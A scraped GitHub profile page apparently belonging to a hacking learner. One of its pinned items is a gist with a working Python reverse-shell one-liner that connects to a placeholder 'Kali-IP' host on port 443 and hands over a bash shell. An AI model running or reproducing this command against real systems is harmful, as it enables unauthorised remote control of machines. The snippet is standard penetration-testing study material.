Skip to content
View lucasgates's full-sized avatar
💭
living.
💭
living.

Block or report lucasgates

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don't include any personal information such as legal names or email addresses. Markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. Python one-liner to create a reverse... Python one-liner to create a reverse shell to listening netcat server.
    1
    python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
  2. lucasgates.github.io lucasgates.github.io Public

    Zero à Hacker

    CSS

  3. simple_reporter simple_reporter Public

    Created with StackBlitz ⚡️

    TypeScript